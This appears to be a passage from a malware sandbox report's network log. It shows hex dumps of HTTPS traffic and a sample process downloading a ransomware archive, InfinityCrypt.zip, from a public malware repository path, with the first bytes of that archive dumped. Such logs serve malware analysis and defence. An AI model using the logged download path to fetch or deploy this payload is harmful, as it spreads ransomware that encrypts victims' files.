2022-09-29 12:49:49 UTC	195	IN	Data Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
2022-09-29 12:49:49 UTC	211	IN	Data Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50 Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
2022-09-29 12:49:49 UTC	227	IN	Data Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8 Data Ascii: =2$4\k)K]p:y3;`/"KK>~z6L6unpG.ga'`k9@5K!uae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
2022-09-29 12:49:49 UTC	243	IN	Data Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83 Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(\|D/AUS3I( 1ZmLSHszVo$RCSOq3Y"Mb7_2@97e!A'h0:&JQmtAFV
2022-09-29 12:49:49 UTC	253	IN	Data Raw: b6 99 00 1e 44 bc 72 e4 68 c1 8e cb 5c 99 bc c6 e8 19 6c ee 00 4a 7c d0 9c da c6 a1 c2 c1 d8 94 81 24 49 c5 03 59 64 11 b9 12 a6 88 e1 42 6e dc 85 9d 1f 96 90 35 9a b8 cd bd 88 c5 23 2f b7 7e 37 21 a8 c3 ff 7c 3a 7a 29 0c e7 0b 07 55 21 cf 8c 28 55 c4 6e 9a 14 fe fd 3d fc 78 bc 99 13 15 f9 55 99 a0 4c d0 97 39 12 50 4d 1d 63 fb a8 88 87 06 41 af eb a8 aa 2f 89 c2 3d d7 61 7c 52 6a a5 ec ca 25 c3 46 a3 84 01 5f 70 9f e0 8a 82 63 29 4f 53 27 b3 8d c9 2c af 27 6d e3 a9 a8 ac f4 b5 28 20 13 0f 3a 91 0c 29 88 58 66 f7 d4 e7 ad c6 9b f2 07 84 31 1d 56 0b 5a f8 7a ab c5 33 52 dc 71 93 90 94 60 2f 6c df 67 f8 fc 60 c4 b8 a6 dd 10 a2 e7 fd 6a 73 e1 a3 6c e2 b2 82 e2 e0 fb 96 af 46 21 97 96 cc 48 9a 47 19 85 02 69 07 44 93 ce e1 1b fa af 2e 95 ad db 60 a0 a4 6f f0 Data Ascii: Drh\lJ\|$IYdBn5#/~7!\|:z)U!(Un=xUL9PMcA/=a\|Rj%F_pc)OS','m( :)Xf1VZz3Rq`/lg`jslF!HGiD.`o
2022-09-29 12:49:49 UTC	269	IN	Data Raw: 39 89 53 e4 fb 8e 75 c7 1d 43 23 52 ea d9 12 c0 94 04 72 ab ef f8 ad ef 47 9c a6 dd 7b c8 2d d1 3c a2 f2 e3 5f 8d c1 a5 d9 76 63 e1 aa ed 59 45 86 27 86 90 76 1b 49 fe e8 f3 b5 84 3e 86 fb 24 48 78 59 10 6d ed d5 32 ff 1a 6a 55 01 34 69 dd 6c 3f 26 c9 fa 9b d8 05 28 1c ff 96 25 c7 c0 22 9b ba e9 70 ff 04 2f 6c 06 a0 7b ea ee bc 62 47 0a be 40 e3 e9 21 18 d6 c5 fa 3c 5e 34 ee d6 76 70 71 6c d2 a7 20 b8 c7 dc 81 96 ed 51 04 65 37 89 56 90 89 c1 92 30 f9 c3 4e e6 28 a9 38 aa 4e e6 c7 b7 5b d9 f5 ca 03 b9 d2 e2 a8 8e bd f0 0b e0 ea c5 ed a4 e3 11 ce b6 bf 28 e9 6e 7e 39 36 a3 e4 c4 65 b2 b9 5c 01 bf 3f 00 08 88 3f 88 d0 ff 57 fa 94 79 40 97 46 c2 16 18 ab a7 2d 12 ab f2 01 6c b7 d4 5b 6f e2 ba fe ff 9c a7 ff be d2 a3 52 78 2a 2d 55 63 a3 3c d3 ad f9 1d be 54 Data Ascii: 9SuC#RrG{-<_vcYE'vI>$HxYm2jU4il?&(%"p/l{bG@!<^4vpql Qe7V0N(8N[(n~96e\??Wy@F-l[oRx*-Uc<T
2022-09-29 12:49:49 UTC	285	IN	Data Raw: 42 16 68 7b c0 b1 db 7d e7 10 24 5a e5 c2 85 f2 90 ac c7 40 dc 90 3c ae ad 73 24 6f 9d ac 86 d5 44 f9 cf 14 a0 a4 49 98 15 0c e2 8c f0 a3 21 d6 d1 0f c9 e1 e1 b6 a9 4f 1c 3f fb b8 70 6e b6 e1 03 0a 62 d8 be 7c ff b5 fc 51 84 d6 b1 6c 0e de c0 77 df d7 34 69 fc c9 a4 6d db af ec 1b 92 42 b2 62 3d 49 f5 65 aa cd ae 21 69 74 d6 f3 a7 b4 e0 8f 2d ac 69 1c 20 26 0b f8 8a 4f 48 3b 85 f4 11 4b 42 ed 6e a5 d2 e2 4e c9 5d 10 53 29 4b 92 e0 be fa c0 fc ef 2d de ae 41 b3 bc 8c 43 c5 0d 5d 07 3a a6 1d 8d 6c 9b 29 f1 9a 5d 2b 4e b3 96 da e7 ed 84 16 4d a2 7f 8e 5d bf a3 e0 43 49 24 7b 02 db bb d6 93 96 cd 27 78 b3 6b 72 38 0a 3a fb 53 74 ca 29 59 bc fb 46 b9 86 d0 e9 95 9b 63 47 1e c6 c6 49 e7 30 bf c0 df e3 83 bc ae 6b df ac 19 9c f2 52 c0 5f 9a 66 1d 39 41 11 58 aa Data Ascii: Bh{}$Z@<s$oDI!O?pnb\|Qlw4imBb=Ie!it-i &OH;KBnN]S)K-AC]:l)]+NM]CI${'xkr8:St)YFcGI0kR_f9AX
2022-09-29 12:49:49 UTC	301	IN	Data Raw: 72 ee ba fd cc 9c bd c3 4e 55 a7 63 d0 86 9d 8b 99 68 6b 69 f4 24 74 d2 30 8f 2b 58 03 cf f6 65 f7 49 ae 4d 71 a6 1b b9 40 50 a0 70 05 f6 93 2d f9 05 5b 26 c0 87 e6 d0 83 99 8b ac dc ef 50 cc bf 3e fb 0f ce 6e 75 12 da b9 bf 71 63 69 fc 8d 90 48 34 ca a1 08 ee 6c 4b 52 34 18 70 45 25 14 17 65 ff c8 41 d8 2e c7 d4 80 94 b3 f6 7f cb a9 e6 f7 a8 a9 0c df 50 a3 4e 2c 85 c5 05 ea f0 95 29 95 a1 0d ad df c9 1e 26 fe 1d 3e e0 eb ae 77 8d 7e b6 41 5f 12 c3 ab 4c 9e 49 8e b7 fd 39 3c 0b 41 cb 66 d0 fd 5f 99 f8 ae b4 1a f7 b0 7f d8 a2 c3 99 d0 59 e6 42 52 b3 f3 53 fd 1c 1f f3 05 a7 b1 5f 0a e3 f0 92 28 a6 9f 96 30 4b 85 b8 71 24 03 28 f8 e2 fb c5 1a 1f ca 40 34 32 7f c8 f8 34 93 d6 61 c1 8c 8b d2 c6 93 50 dd 1a 44 b5 34 79 db 97 bd c2 85 3d 0a d3 2a 67 bf f4 32 93 Data Ascii: rNUchki$t0+XeIMq@Pp-[&P>nuqciH4lKR4pE%eA.PN,)&>w~A_LI9<Af_YBRS_(0Kq$(@424aPD4y=*g2
2022-09-29 12:49:49 UTC	317	IN	Data Raw: a7 bc 1b e7 4d 1a 9e c4 1a 3b b3 01 80 d3 e6 8d 37 53 68 3a 36 2f f9 ac f1 be ba cd e3 15 04 81 fb bf 53 e8 48 79 ac a6 fd 96 94 9b 90 5a dd 97 02 67 cf 2c 31 9c 6d 58 69 a4 b0 6a fc df 2a 53 2a 46 70 53 fa e3 b1 bb 1a f4 b0 1c b9 ce fb 6b 4e 23 19 b6 57 9e b9 1c bb dc 4b 13 6f ea 94 99 1d ed ed 05 4c 20 4d ad f7 2c 46 ce b8 af cc 78 27 07 e6 f6 b7 0d a4 cc 1a 60 99 c9 33 38 16 d3 7b bd 4b ed d2 9f 85 c1 2e c8 e1 33 2d 7b 56 b4 a8 dc 0d 0a a2 3d 13 9c 5c 90 d6 17 01 fd 5d 96 46 dd f8 4e 03 a9 7d 15 84 e4 f7 b2 4f 34 49 e2 3d 4b 31 85 14 a5 b1 8f da e8 c5 1d 81 ec 04 09 2f 81 21 ce 54 0e c7 40 36 ab 90 89 94 e1 bf f2 fc a6 89 10 60 40 ee db 31 2b 41 c8 ff da 5e ad a6 b1 45 b4 ed fe 89 b4 02 ca 63 c5 46 bf 19 b9 e7 1c e9 83 78 ee fd 7f 9d 1a 2e df a1 81 f5 Data Ascii: M;7Sh:6/SHyZg,1mXijSFpSkN#WKoL M,Fx'`38{K.3-{V=\]FN}O4I=K1/!T@6`@1+A^EcFx.
2022-09-29 12:49:49 UTC	333	IN	Data Raw: 8b 6d 9b f4 38 89 f4 56 77 6b f2 bc 49 f3 b8 e8 ba 99 7d 9a ed d2 28 38 09 a5 94 9f 6b da e4 66 b4 ff 2e 44 d5 f8 c9 fd ea 54 5a 97 95 47 60 4c 8c 28 37 d6 08 9a 25 93 d8 3b b0 5c 25 e2 1f 91 cc 89 11 34 07 04 4b 63 80 91 eb eb 9a d6 b2 64 6f 51 ff 0f 6e 69 ab 2a fa 8c 47 4d 15 95 43 7e 29 4c c3 72 8e 65 69 43 01 9a 20 69 d8 ce fd 19 31 b6 e6 40 3b 43 be 95 82 cf 54 8b 60 fb 37 7d f3 cc ac 2d ba 4b 27 b5 95 32 cf 04 6b 4e c9 f9 df 27 2e e5 48 ac 79 c6 bf ea 45 1b 88 1c a0 77 de 4a 14 dd df d8 fa 2b c5 c8 8d 04 56 eb d1 f3 e4 53 72 9e 6d 7e b2 ad b1 d9 32 5f 46 6b a6 fa ea 8a 6f ab 71 9f 71 34 c6 41 ef 76 a0 d2 8b 39 65 c3 4a 6a 98 a1 99 9a 69 13 50 67 92 a0 1a 3c 29 dc d7 a2 cc 7c 96 28 0c a1 fd 72 96 8b bf a8 d9 bb ab 09 90 c8 8e ed 45 62 fb 23 e4 7d 82 Data Ascii: m8VwkI}(8kf.DTZG`L(7%;\%4KcdoQni*GMC~)LreiC i1@;CT`7}-K'2kN'.HyEwJ+VSrm~2_Fkoqq4Av9eJjiPg<)\|(rEb#}
2022-09-29 12:49:49 UTC	349	IN	Data Raw: d2 e9 66 6b 1b d4 0e f7 a6 f7 97 f2 66 41 3d 26 29 bc 5b 32 82 78 b3 b1 7e ef a5 2b 1b 04 51 1b 6b 1b 41 ec 19 66 b3 48 08 37 ae c6 9f ab 95 8b f7 53 3f 2a 30 66 a8 b8 55 94 bc c0 5b 53 54 da 48 87 0a dd 6a fd de f4 ff ec 44 6d ec 03 5e 9a e5 cf c6 99 4e a0 a2 25 f8 f7 ac bd 27 07 1a 6c 7c 52 64 f2 8b a6 95 81 63 62 45 76 79 64 ed 58 ed 94 51 51 7a 7d d5 d1 85 16 ed bf 2e 12 92 2d 4d 39 61 60 52 ec 57 92 80 a2 2c 94 dc 12 71 ce 72 cd c2 3c 72 01 9b ee 01 57 ae 9a 52 55 c3 8b 4f 38 25 06 36 8c c6 7d eb 9e e7 13 88 99 4e d2 4b 4c 16 20 b9 e2 20 28 d2 e7 e2 c9 e5 4f 70 b7 83 c5 0e 7a e4 68 74 a1 c0 99 66 a6 87 ea 64 c1 c9 23 ef 44 6a 5d 18 de 3d 08 f2 b3 b5 1a 17 b7 22 60 f8 ed f9 e6 c1 27 ae 5f c2 78 ca 55 78 1d 6c 06 cf 32 55 ea 8c 73 65 84 40 75 c6 48 61 Data Ascii: fkfA=&)[2x~+QkAfH7S?*0fU[STHjDm^N%'l\|RdcbEvydXQQz}.-M9a`RW,qr<rWRUO8%6}NKL (Opzhtfd#Dj]="`'_xUxl2Use@uHa
2022-09-29 12:49:49 UTC	365	IN	Data Raw: 25 f1 23 15 4a fb df 8c 18 8f 2f 39 7e f9 66 53 a2 e5 ed 16 1a b8 be d7 60 d7 81 35 91 15 9d 63 60 0c 7a 42 ac ce a1 e7 a9 12 54 13 69 54 45 38 ad 30 71 79 6c 20 74 44 2a c0 33 37 ff 7c 2b 17 4f 0a 61 56 f1 4a b6 c2 77 67 56 94 13 a4 78 1a 29 51 47 9f fb 62 0a d3 05 5f 68 14 cb c5 56 72 a0 6c dd 42 fb 9f fc d9 91 98 84 21 4d db 85 4d 99 a8 26 48 42 52 61 30 91 56 6e bb 50 4f a9 4f 9b c9 cd 2f 4f 6d bc 72 26 fd 03 e6 f0 25 a4 c2 6b 75 4d b2 90 fe ba c6 e0 53 da 58 f6 dd 9a 8c ff 8b 6a 12 df de 07 15 ee f5 cd e1 34 52 db fb 41 ec ee 01 07 6d 7f f3 a8 5a f6 c5 b7 18 10 60 69 66 43 fb 97 19 2a 7d 57 da 0e a3 17 8c e5 c0 f5 14 d7 a9 8a 02 52 88 25 bc ef 8e ba de 6d 81 2f 90 31 99 77 3f de 39 ba 7a b5 fa d2 68 84 70 66 e4 b5 f7 6c ac b0 9c 58 20 c2 0c 44 18 63 Data Ascii: %#J/9~fS`5c`zBTiTE80qyl tD37\|+OaVJwgVx)QGb_hVrlB!MM&HBRa0VnPOO/Omr&%kuMSXj4RAmZ`ifC}WR%m/1w?9zhpflX Dc
2022-09-29 12:49:49 UTC	381	IN	Data Raw: be 87 49 ef b4 ac 86 6d 69 50 97 71 49 d1 bb 8b 12 7e 16 3d 3b 51 c7 6a 1b ab 2f 36 bb 74 2f 76 3b b2 74 c1 3b af 1e e9 da 1f ca f4 c9 0a ae 46 1d 48 dc f7 89 6e fe 47 e1 dd 6d 8c bf cb 33 92 90 cd 24 e6 8c b8 99 43 f3 62 07 27 21 c4 b6 72 ca a2 a3 1a 7c 91 46 b6 23 94 3d 1e 48 57 87 bb 89 67 48 3d 1e 0a ce 2e 38 48 00 62 e9 3c 98 f9 dc 04 04 dd 54 9c 7c a1 9b 63 8f 17 bf 31 15 9d 34 41 5e 2d 2b bb 02 93 18 05 63 13 e4 c7 61 62 31 7e ea 08 46 ba 6a 74 e2 1c a0 7a 2d 4d ea d9 28 fa 72 09 a2 ec df d3 e6 5e 52 33 da e6 c9 69 52 31 93 2a 37 0f a9 5e 62 a3 3b 95 8a 13 e7 20 bd ef c6 04 fb 83 d0 f4 43 b2 44 5d 81 5d b7 78 c5 67 25 b1 9d 62 3b ce ab 37 aa 92 a3 41 f6 10 5e 17 bf 43 de 59 98 6d 7c d1 a3 32 12 25 6e 1d 70 eb 88 3b 05 d7 ad e7 d5 88 ab 4d 6d ae 31 Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r\|F#=HWgH=.8Hb<T\|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm\|2%np;Mm1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49746	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:28 UTC	1113	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1 Host: github.com
2022-09-29 12:50:28 UTC	1113	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:48:36 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:28 UTC	1114	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49747	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:29 UTC	1116	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:50:29 UTC	1116	IN	HTTP/1.1 200 OK Connection: close Content-Length: 34300 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:50:29 GMT Via: 1.1 varnish X-Served-By: cache-mxp6921-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455829.051861,VS0,VE160 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 35971de62f62a1591845d0fdf45838cbfc98b0d2 Expires: Thu, 29 Sep 2022 12:55:29 GMT Source-Age: 0
2022-09-29 12:50:29 UTC	1117	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN\|VNtQ*#2YoPS;}\|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
2022-09-29 12:50:29 UTC	1118	IN	Data Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi\|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
2022-09-29 12:50:29 UTC	1119	IN	Data Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1 Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ\|sAIl4X~X([@z:e/)3\|<1#6#$>;]V9L3K\|2) .nubSW:}
2022-09-29 12:50:29 UTC	1121	IN	Data Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72 Data Ascii: p _=i!\|#WE+^\|B3e\|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
